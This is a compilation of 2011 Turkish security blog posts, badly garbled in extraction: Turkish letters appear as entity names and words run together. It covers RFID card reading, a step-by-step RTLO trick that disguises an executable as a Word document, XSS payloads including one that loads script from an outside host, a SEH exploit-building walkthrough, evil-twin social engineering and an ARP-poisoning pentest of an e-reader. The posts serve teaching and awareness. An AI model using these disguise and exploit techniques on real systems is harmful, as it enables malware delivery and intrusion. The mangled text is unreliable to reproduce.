ccedilalıştırır ccedilalıştırmaz temassız kredi kartından kredi kartı numarasını ve son kullanma tarihini başarıylaokuyabildiğini goumlrduumlkten sonra testi tamamladım

2008 yılından farklı olarak temassız kredi kartında yer alan etikette artık muumlşteri adı ve soyadının yer almamasını sevinccedille karşılamışolmama rağmen kredi kartı numarasının ve son kullanma tarihinin halen okunabiliyor olması her ne kadar direkt olarak dolandırıcılartarafından alehyte kullanılamayacak olsa da sosyal muumlhendislik youmlntemleri ile diğer bilgiler ile birleştirilerek kullanılma ihtimalikonusunda duumlşuumlnduumlrtmeye yetti

Peki ya sonuccedil Sonuccedil itibariyle cuumlzdanınızda veya cebinizde bulunan kredi kartı numaranız ve kredi kartınızın son kullanma tarihi birşekilde (bu 2008 yılındaki videoda olduğu gibi koca bir RFID okuyucuyu cebinize yakınlaştırarak olabilir RFID kapı anteni kullanılarakolabilir veya StrongLink gibi ufak bir okuyucu kullanarak olabilir) meraklı kişi veya kişiler tarafından okunabilir Bu ihtimal duumlşuumlkdahi olsa sizin iccedilin oumlnemli bir husus ise ccediloumlzuumlm oumlnerisi olarak 20$ gibi cuumlzi bir uumlcret oumldeyerek internetten sipariş edebileceğiniz RFIDkorumalı bir cuumlzdan kullanmanızı oumlnerebilirim

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Her Goumlrduumlğuumlne İnanmaSource httpswwwmertsaricacomher-gordugune-inanmaBy MS on November 1st 2011

RTLO namı diğer RIGHT-TO-LEFT OVERRIDE Windows XP işletim sistemi kullanırken pek ccediloğumuzun dikkate almadığı ancakWindows Vista ve Windows 7 işletim sistemi kullanırken ccedilok dikkatli olmamızı gerektiren bir Evrensel kod (unicode) karakteridir(u202E) RTLO kısaca karakterlerin soldan sağa değil sağdan sola olarak işlem goumlrmesini sağlar ve bu sayede sağdan sola yazılan diller(Arapccedila İbranice Suumlryanice vs) desteklenebilmektedir

Windows XP işletim sistemi varsayılan (default) olarak az oumlnce bahsi geccedilen dilleri desteklememekte ek bir paket yuumlklenerek (Installfiles for complex script and right-to-left languages) destekleyebilmekteydi Ancak Windows Vista ve Windows 7 işletim sistemlerininhayatımıza girmesi ile bu durum değişti ve varsayılan olarak bu diller desteklenir hale geldi Peki bu desteğin bizimle ne ilgisi var

Yıllarca yakınımızdakiler tarafından yapılan şu şekilde uyarılara kulak kabarttık durduk Bir dosyayı ccedilalıştırmadan oumlnce uzantısınamutlaka dikkat et Uzantısı exe ise sakın ccedilalıştırma viruumls olabilir ve bu sayede yıllar iccedilinde hepimiz ister istemez bir dosyayı

15

ccedilalıştırmadan oumlnce uzantısına dikkat eder olduk Ccediloğu kimse farkında olmasa da bu kontrol sayesinde art niyetli kişiler zararlı yazılımlarısistemlere bulaştırabilmek iccedilin daha farklı sosyal muumlhendislik youmlntemlerine başvurmak zorunda kaldılar Bu youmlntemlerden biri de RTLOevrensel kod karakterli dosya adlarına sahip zararlı yazılımlar oluşturmak oldu Peki bu dosya adlarını nasıl oluşturuyorlar da kullanıcılarıkolaylıkla kandırabiliyorlar

Oumlncelikle RTLO evrensel kod karakteri iccedileren dosya adını Windows 7 işletim sistemi uumlzerinde oluşturabilmek iccedilin kayıt defterinde(registry) bir kaccedil değişiklik yapmak ve daha sonra sistemi yeniden başlatmak gerekiyor

Bunun iccedilin izlenmesi gereken adımlar sırasıyla

bull Regedit komutu ccedilalıştırılır (Start -gt Arama kutucuğu -gt regedit)

bull HKEY_CURRENT_USERControl PanelInput Method altında EnableHexNumpad anahtarı oluşturulur ve anahtara 1 değeriatanır

bull Sistem yeniden başlatılır

Ardından exe olan program uzantısının istenilen başka bir uzantıymış gibi goumlruumlnmesi iccedilin RTLO evrensel kod karakterini dosya adındakullanıyorlar Daha net olması adına ufak bir oumlrnek uumlzerinden ilerleyelim

bull Windowssystem32 klasoumlruuml altında yer alan calcexe programını dilediğiniz bir klasoumlre kopyalayın

bull Programın uzantısının doc olarak goumlruumlnmesini sağlayacağımız iccedilin programın simgesini (icon) Microsoft Word simgesi olarakdeğiştirin (Resource Hacker programı işinizi goumlrecektir)

bull Daha sonra programın adını (rename) codexe olarak değiştirin

bull Ardından programın adını tekrar değiştirmek iccedilin programın uumlzerine farenin sağ tuşu ile basıp menuumlden yeniden adlandır (rename)oumlğesini seccedilin

bull İmleci c harfinin başına (en sol) getirin ve ardından klavyeden NUMLOCK accedilık iken ALT ve FN tuşlarına basılı tutarak +202Etuşlarına basın

Goumlrduumlğuumlnuumlz uumlzere programın uzantısı artık doc olarak goumlzuumlkuumlyor Komut satırından programın bulunduğu klasoumlrde DIR komutunuccedilalıştıracak olursanız bu yanılgının goumlruumlntuumlden ibaret olduğunu hemen anlayabilirsiniz

16

Python ile yukarıda bahsetmiş olduğum adımları (simge değiştirme hariccedil) otomatize eden RTLOpy isimli programa buradanulaşabilirsiniz

Programın kullanımı python rtlopy [extension] [source filename] [new filename]Oumlrnek kullanım python rtlopy doc calcexe Confidential_document_no_

Sonuccedil olarak Windows Vista veya Windows 7 kullanıcısıysanız ve eskiden kalma uzantı kontroluuml yaparak programları goumlzuuml kapalıccedilalıştırma alışkanlığınız varsa yakın zamanda sıkıntı yaşama ihtimaline karşı programları ccedilalıştırmadan oumlnce iccedilinde bulunduğu klasoumlrdeyer alan TYPE (Application ise dikkat) kolonuna veya HEX Editoumlr ile başlık bilgisine (ilk 2 bayt MZ ise dikkat) dikkat etmeniz faydalıolacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Zararlı Yazılım Analisti OlmakhellipSource httpswwwmertsaricacomzararli-yazilim-analisti-olmakBy MS on October 5th 2011

Son yıllarda Windows işletim sistemini hedef alan Zeus SpyEye TDL gibi hatrı sayılır zararlı yazılımlara manşetlerde sıkccedila rastlıyordukDaha sonra o ccedilok guumlvenli Mac OS X işletim sisteminin kullanım oranının artış goumlstermesi ile (bunun en buumlyuumlk nedenlerinden biri de MacOS Xe zararlı yazılım bulaşmaz yanılgısı olsa gerek) bu sisteme youmlnelik geliştirilen zararlı yazılımlar da manşetlerde yerini birer bireralmaya başladı Guumln geldi tweet atmaktan internette soumlrf yapmaya e-posta okumaktan bankacılık işlemleri gerccedilekleştirmeye kadar birccedilok alanda ihtiyaccedillarımızı karşılayabilen modern işletim sistemleri ile guumlccedillendirilmiş olan akıllı mobil cihazlar iccedilin geliştirilen zararlıyazılımlar manşetleri suumlslemeye başladı Peki bilgi hırsızlığı iccedilin geliştirilen zararlı yazılımlar neden bu kadar revaccedilta

17

Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

